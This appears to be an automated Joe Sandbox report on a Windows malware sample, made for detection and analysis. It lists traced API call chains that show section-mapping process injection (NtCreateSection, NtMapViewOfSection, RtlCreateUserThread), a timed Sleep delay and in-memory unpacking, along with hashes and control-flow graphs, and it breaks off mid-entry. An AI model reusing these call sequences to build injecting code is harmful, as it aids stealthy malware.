                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:5.8%
                                                                                Dynamic/Decrypted Code Coverage:39.3%
                                                                                Signature Coverage:53.6%
                                                                                Total number of Nodes:84
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 3873 2733d33 3874 2733d55 3873->3874 3877 27344e2 3874->3877 3883 27344fd 3877->3883 3878 2734506 CreateToolhelp32Snapshot 3879 2734522 Module32First 3878->3879 3878->3883 3880 2734531 3879->3880 3882 2733d5a 3879->3882 3884 27341a1 3880->3884 3883->3878 3883->3879 3885 27341cc 3884->3885 3886 2734215 3885->3886 3887 27341dd VirtualAlloc 3885->3887 3886->3886 3887->3886 4007 26e092b GetPEB 4008 26e0972 4007->4008 3953 401906 3954 40191c 3953->3954 3955 401941 Sleep 3954->3955 3956 40195c 3955->3956 3957 401513 7 API calls 3956->3957 3958 40196d 3956->3958 3957->3958 3907 403149 3908 403150 3907->3908 3909 4030fe RtlCreateUserThread NtTerminateProcess 3908->3909 3911 403157 3908->3911 3910 40312a 3909->3910 3911->3911 3912 402e8e 3914 402e86 3912->3914 3915 402f1f 3914->3915 3916 4018fa 3914->3916 3917 40190a 3916->3917 3918 401941 Sleep 3917->3918 3919 40195c 3918->3919 3921 40196d 3919->3921 3922 401513 3919->3922 3921->3915 3923 401522 3922->3923 3924 4015c1 NtDuplicateObject 3923->3924 3928 4016dd 3923->3928 3925 4015de NtCreateSection 3924->3925 3924->3928 3926 401604 NtMapViewOfSection 3925->3926 3927 40165e NtCreateSection 3925->3927 3926->3927 3929 401627 NtMapViewOfSection 3926->3929 3927->3928 3930 40168a 3927->3930 3928->3921 3929->3927 3931 401645 3929->3931 3930->3928 3932 401694 NtMapViewOfSection 3930->3932 3931->3927 3932->3928 3933 4016bb NtMapViewOfSection 3932->3933 3933->3928 3934 2733d3c 3937 2733d42 3934->3937 3938 2733d51 3937->3938 3939 27344e2 3 API calls 3938->3939 3940 2733d41 3939->3940 3888 26e003c 3889 26e0049 3888->3889 3901 26e0e0f SetErrorMode SetErrorMode 3889->3901 3894 26e0265 3895 26e02ce VirtualProtect 3894->3895 3897 26e030b 3895->3897 3896 26e0439 VirtualFree 3900 26e04be LoadLibraryA 3896->3900 3897->3896 3899 26e08c7 3900->3899 3902 26e0223 3901->3902 3903 26e0d90 3902->3903 3904 26e0dad 3903->3904 3905 26e0dbb GetPEB 3904->3905 3906 26e0238 VirtualAlloc 3904->3906 3905->3906 3906->3894 4009 402fd3 4010 40312a 4009->4010 4011 402ffd 4009->4011 4011->4010 4012 4030fe RtlCreateUserThread NtTerminateProcess 4011->4012 4012->4010 4003 402e35 4004 402e6f 4003->4004 4005 4018fa 8 API calls 4004->4005 4006 402f1f 4004->4006 4005->4006 3965 40151e 3967 40154c 3965->3967 3966 4016dd 3967->3966 3968 4015c1 NtDuplicateObject 3967->3968 3968->3966 3969 4015de NtCreateSection 3968->3969 3970 401604 NtMapViewOfSection 3969->3970 3971 40165e NtCreateSection 3969->3971 3970->3971 3972 401627 NtMapViewOfSection 3970->3972 3971->3966 3973 40168a 3971->3973 3972->3971 3974 401645 3972->3974 3973->3966 3975 401694 NtMapViewOfSection 3973->3975 3974->3971 3975->3966 3976 4016bb NtMapViewOfSection 3975->3976 3976->3966

                                                                                Executed Functions

                                                                                Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 401513-401546 92 401555 85->92 93 40154c-40156b call 401196 85->93 92->93 97 401570-401575 93->97 98 40156d 93->98 100 40157b-40158c 97->100 101 40189d-4018a5 97->101 98->97 104 401592-4015bb 100->104 105 40189b-4018bf 100->105 101->97 104->105 115 4015c1-4015d8 NtDuplicateObject 104->115 109 4018b0-4018bb 105->109 110 4018c2-4018d4 105->110 109->110 113 4018d7 110->113 114 4018ca-4018d0 110->114 116 4018eb 113->116 117 4018df-4018f7 call 401196 113->117 114->113 115->105 118 4015de-401602 NtCreateSection 115->118 116->117 120 401604-401625 NtMapViewOfSection 118->120 121 40165e-401684 NtCreateSection 118->121 120->121 123 401627-401643 NtMapViewOfSection 120->123 121->105 124 40168a-40168e 121->124 123->121 126 401645-40165b 123->126 124->105 127 401694-4016b5 NtMapViewOfSection 124->127 126->121 127->105 128 4016bb-4016d7 NtMapViewOfSection 127->128 128->105 130 4016dd call 4016e2 128->130
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                                                                                • Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
                                                                                • Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                                                                                • Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25
                                                                                Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 132 40151e-40156b call 401196 137 401570-401575 132->137 138 40156d 132->138 140 40157b-40158c 137->140 141 40189d-4018a5 137->141 138->137 144 401592-4015bb 140->144 145 40189b-4018bf 140->145 141->137 144->145 155 4015c1-4015d8 NtDuplicateObject 144->155 149 4018b0-4018bb 145->149 150 4018c2-4018d4 145->150 149->150 153 4018d7 150->153 154 4018ca-4018d0 150->154 156 4018eb 153->156 157 4018df-4018f7 call 401196 153->157 154->153 155->145 158 4015de-401602 NtCreateSection 155->158 156->157 160 401604-401625 NtMapViewOfSection 158->160 161 40165e-401684 NtCreateSection 158->161 160->161 163 401627-401643 NtMapViewOfSection 160->163 161->145 164 40168a-40168e 161->164 163->161 166 401645-40165b 163->166 164->145 167 401694-4016b5 NtMapViewOfSection 164->167 166->161 167->145 168 4016bb-4016d7 NtMapViewOfSection 167->168 168->145 170 4016dd call 4016e2 168->170
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                                                                                • Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
                                                                                • Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                                                                                • Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24
                                                                                Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 172 401553-40156b call 401196 178 401570-401575 172->178 179 40156d 172->179 181 40157b-40158c 178->181 182 40189d-4018a5 178->182 179->178 185 401592-4015bb 181->185 186 40189b-4018bf 181->186 182->178 185->186 196 4015c1-4015d8 NtDuplicateObject 185->196 190 4018b0-4018bb 186->190 191 4018c2-4018d4 186->191 190->191 194 4018d7 191->194 195 4018ca-4018d0 191->195 197 4018eb 194->197 198 4018df-4018f7 call 401196 194->198 195->194 196->186 199 4015de-401602 NtCreateSection 196->199 197->198 201 401604-401625 NtMapViewOfSection 199->201 202 40165e-401684 NtCreateSection 199->202 201->202 204 401627-401643 NtMapViewOfSection 201->204 202->186 205 40168a-40168e 202->205 204->202 207 401645-40165b 204->207 205->186 208 401694-4016b5 NtMapViewOfSection 205->208 207->202 208->186 209 4016bb-4016d7 NtMapViewOfSection 208->209 209->186 211 4016dd call 4016e2 209->211
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                                                                                • Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
                                                                                • Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                                                                                • Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24
                                                                                Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 213 402fd3-402ff7 214 40312a-40312f 213->214 215 402ffd-403015 213->215 215->214 216 40301b-40302c 215->216 217 40302e-403037 216->217 218 40303c-40304a 217->218 218->218 219 40304c-403053 218->219 220 403075-40307c 219->220 221 403055-403074 219->221 222 40309e-4030a1 220->222 223 40307e-40309d 220->223 221->220 224 4030a3-4030a6 222->224 225 4030aa 222->225 223->222 224->225 226 4030a8 224->226 225->217 227 4030ac-4030b1 225->227 226->227 227->214 228 4030b3-4030b6 227->228 228->214 229 4030b8-403127 RtlCreateUserThread NtTerminateProcess 228->229 229->214
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                • String ID:
                                                                                • API String ID: 1921587553-0
                                                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                • Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
                                                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                • Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9
                                                                                Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 231 403149-40314e 232 403150-403151 231->232 233 403152-403156 231->233 232->233 234 403157-403172 233->234 235 4030fe-403127 RtlCreateUserThread NtTerminateProcess 233->235 239 403174 234->239 237 40312a-40312f 235->237 240 403176 239->240 241 40317d-403182 239->241 240->241 242 403178 240->242 243 403184 241->243 244 40318a-403192 call 40120f 241->244 242->241 243->244 245 403186-403189 243->245 244->239 248 403196-4031ac 244->248 245->244 251 4031b0 248->251 251->251
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                                                                                • Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
                                                                                • Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                                                                                • Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F
                                                                                Function 027344E2 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 252 27344e2-27344fb 253 27344fd-27344ff 252->253 254 2734501 253->254 255 2734506-2734512 CreateToolhelp32Snapshot 253->255 254->255 256 2734522-273452f Module32First 255->256 257 2734514-273451a 255->257 258 2734531-2734532 call 27341a1 256->258 259 2734538-2734540 256->259 257->256 264 273451c-2734520 257->264 262 2734537 258->262 262->259 264->253 264->256
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0273450A
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 0273452A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1766013823.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0272D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_272d000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 406217f69041ff2eff213512f2c96360b8bcdfa19b8dca6f07bfd0cdad0427cd
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 2EF09036A007246BE7253BF9A89CBAE76ECAF49629F100529F643D14C1DB70E8458A61
                                                                                Function 026E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 26e003c-26e0047 1 26e004c-26e0263 call 26e0a3f call 26e0e0f call 26e0d90 VirtualAlloc 0->1 2 26e0049 0->2 17 26e028b-26e0292 1->17 18 26e0265-26e0289 call 26e0a69 1->18 2->1 20 26e02a1-26e02b0 17->20 22 26e02ce-26e03c2 VirtualProtect call 26e0cce call 26e0ce7 18->22 20->22 23 26e02b2-26e02cc 20->23 29 26e03d1-26e03e0 22->29 23->20 30 26e0439-26e04b8 VirtualFree 29->30 31 26e03e2-26e0437 call 26e0ce7 29->31 33 26e04be-26e04cd 30->33 34 26e05f4-26e05fe 30->34 31->29 36 26e04d3-26e04dd 33->36 37 26e077f-26e0789 34->37 38 26e0604-26e060d 34->38 36->34 40 26e04e3-26e0505 36->40 41 26e078b-26e07a3 37->41 42 26e07a6-26e07b0 37->42 38->37 43 26e0613-26e0637 38->43 51 26e0517-26e0520 40->51 52 26e0507-26e0515 40->52 41->42 44 26e086e-26e08be LoadLibraryA 42->44 45 26e07b6-26e07cb 42->45 46 26e063e-26e0648 43->46 50 26e08c7-26e08f9 44->50 48 26e07d2-26e07d5 45->48 46->37 49 26e064e-26e065a 46->49 53 26e07d7-26e07e0 48->53 54 26e0824-26e0833 48->54 49->37 55 26e0660-26e066a 49->55 57 26e08fb-26e0901 50->57 58 26e0902-26e091d 50->58 59 26e0526-26e0547 51->59 52->59 60 26e07e4-26e0822 53->60 61 26e07e2 53->61 56 26e0839-26e083c 54->56 62 26e067a-26e0689 55->62 56->44 63 26e083e-26e0847 56->63 57->58 66 26e054d-26e0550 59->66 60->48 61->54 64 26e068f-26e06b2 62->64 65 26e0750-26e077a 62->65 67 26e084b-26e086c 63->67 68 26e0849 63->68 69 26e06ef-26e06fc 64->69 70 26e06b4-26e06ed 64->70 65->46 72 26e0556-26e056b 66->72 73 26e05e0-26e05ef 66->73 67->56 68->44 74 26e06fe-26e0748 69->74 75 26e074b 69->75 70->69 76 26e056f-26e057a 72->76 77 26e056d 72->77 73->36 74->75 75->62 78 26e057c-26e0599 76->78 79 26e059b-26e05bb 76->79 77->73 84 26e05bd-26e05db 78->84 79->84 84->66
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 026E024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_26e0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: f72ae1ea722be14b2459ee282943af6ad2a101b6dfd3519f2362ee7df3398fe5
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 06526974A01229DFDB64CF58C985BACBBB1BF09304F1480D9E94EAB351DB70AA85CF14
                                                                                Function 026E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 26e0e0f-26e0e24 SetErrorMode * 2 266 26e0e2b-26e0e2c 265->266 267 26e0e26 265->267 267->266
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,026E0223,?,?), ref: 026E0E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,026E0223,?,?), ref: 026E0E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_26e0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: b2cad5673d59e3f33c04b078aaa78f4ac216478fcc09ce84b1cd0ac0d0e9666a
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 79D0123114512877DB003A94DC09BCD7B1CDF05B66F008021FB0DE9180C7B0954046E5
                                                                                Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 268 40192a-40195e call 401196 Sleep call 40141a 277 401960-401968 call 401513 268->277 278 40196d-4019b8 call 401196 268->278 277->278
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                                                                                • Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
                                                                                • Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                                                                                • Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F
                                                                                Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 292 4018fa-40195e call 401196 Sleep call 40141a 306 401960-401968 call 401513 292->306 307 40196d-4019b8 call 401196 292->307 306->307
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                                                                                • Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
                                                                                • Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                                                                                • Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F
                                                                                Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 321 401906-40195e call 401196 Sleep call 40141a 333 401960-401968 call 401513 321->333 334 40196d-4019b8 call 401196 321->334 333->334
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                                                                                • Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
                                                                                • Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                                                                                • Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F
                                                                                Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 348 401937-40193b 349 401925-401939 348->349 350 40193c-40195e call 401196 Sleep call 40141a 348->350 349->350 359 401960-401968 call 401513 350->359 360 40196d-4019b8 call 401196 350->360 359->360
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                                                                                • Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
                                                                                • Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                                                                                • Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B
                                                                                Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 374 401926-40195e call 401196 Sleep call 40141a 385 401960-401968 call 401513 374->385 386 40196d-4019b8 call 401196 374->386 385->386
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                                                                                • Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
                                                                                • Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                                                                                • Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F
                                                                                Function 027341A1 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 400 27341a1-27341db call 27344b4 403 2734229 400->403 404 27341dd-2734210 VirtualAlloc call 273422e 400->404 403->403 406 2734215-2734227 404->406 406->403
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027341F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1766013823.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0272D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
